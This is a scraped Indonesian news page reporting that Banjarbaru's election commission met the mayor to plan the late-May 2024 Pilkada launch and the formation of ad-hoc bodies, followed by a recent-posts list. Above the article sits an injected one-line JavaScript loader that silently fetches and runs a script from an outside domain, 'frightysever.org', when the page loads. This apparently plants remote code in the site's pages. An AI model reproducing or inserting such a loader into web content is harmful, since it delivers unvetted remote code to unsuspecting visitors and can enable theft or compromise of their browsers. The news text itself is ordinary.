(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

KPU Banjarbaru Rencanakan Launching Pilkada 2024 Akhir Mei


KANALKALIMANTAN.COM, BANJARBARU – Komisi Pemilihan Umum (KPU) Kota Banjarbaru menggelar audiensi bersama Wali Kota Banjarbaru, Aditya Mufti Ariffin, di rumah dinas, Rabu (1/5/2024) kemarin.

Dalam audiensi tersebut sejumlah Komisioner KPU yang datang membahas terkait tahapan-tahapan Pilkada 2024 yang tengah berjalan dan akan berjalan.

Ketua KPU Banjarbaru Rozy Maulana menyampaikan rencana terkait penyelenggaraan launching Pilkada 2024 di Kota Banjarbaru. Kegiatan ini digelar untuk meningkatkan kesadaran masyarakat dalam Pilkada 2024.

“Untuk launching Pilkada 2024 kami sampaikan kepada Wali Kota insyaallah akan digelar di akhir bulan Mei mendatang,” ujar Rozy Maulana.

Baca juga: Jembatan Pulau Telo Tertabrak Kapal Pembawa Crane, Pj Bupati Cek Kondisi

Lebih lanjut saat ini, dijelaskannya KPU juga tengah disibukkan dengan pembentukan badan ad-hoc di tingkat kecamatan dan kelurahan di Kota Banjarbaru.

Rozy juga menyebutkannya rencana terkait persiapan pembentukan sekretariat kepada Wali Kota Aditya.

Disebutkan bahwa anggota sekretariat pada tingkat kecamatan yang nantinya dipilih merupakan dari Aparatur Sipil Negara (ASN) di lingkup kantor kecamatan.

“Berbeda dengan sebelumnya untuk Pilkada 2024 ini sesuai arahan KPU RI bahwasanya setelah badan ad-hoc dilantik nantinya di tanggal 16 Mei, maka paling lambat seminggu kemudian sekretariat harus terbentuk dengan SK dari Wali Kota,” jelas dia.

Baca juga: HMI Banjarmasin Komitmen Perjuangkan Kesejahteraan dan Hak Buruh

“Jadi kami minta Wali Kota untuk follow up itu, mudah-mudahan bisa cepat supaya PPK bisa bekerja langsung setelah dilantik dan terbentuknya sekretariat,” sambungnya.

Lebih jauh, saat ini KPU juga tengah mempersiapan pendaftaran maupun penyerahan dukungan perseorangan atau independen untuk Pilkada 2024. Yang mana KPU juga akan melakukan sosialisasi terkait teknis cara dan mekanisme pendaftaran dukungan perseorangan.

Sementara itu untuk pendaftaran Panitia Pemungutan Suara (PPS) dijadwalkan dimulai pada hari ini tanggal 2 Mei 2024 dan berlangsung sampai tanggal 8 Mei 2024. (Kanalkalimantan.com/wanda)

Reporter: wanda
Editor: bie


Risa

Recent Posts

Hari Museum Internasional 2024 “Museum untuk Pendidikan dan Penelitian”

KANALKALIMANTAN.COM - Hari Museum Internasional yang ditetapkan oleh ICOM dan dirayakan setiap tahun pada tanggal… Read More

2 jam ago

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

3 jam ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

3 jam ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

3 jam ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

7 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

9 jam ago

This website uses cookies.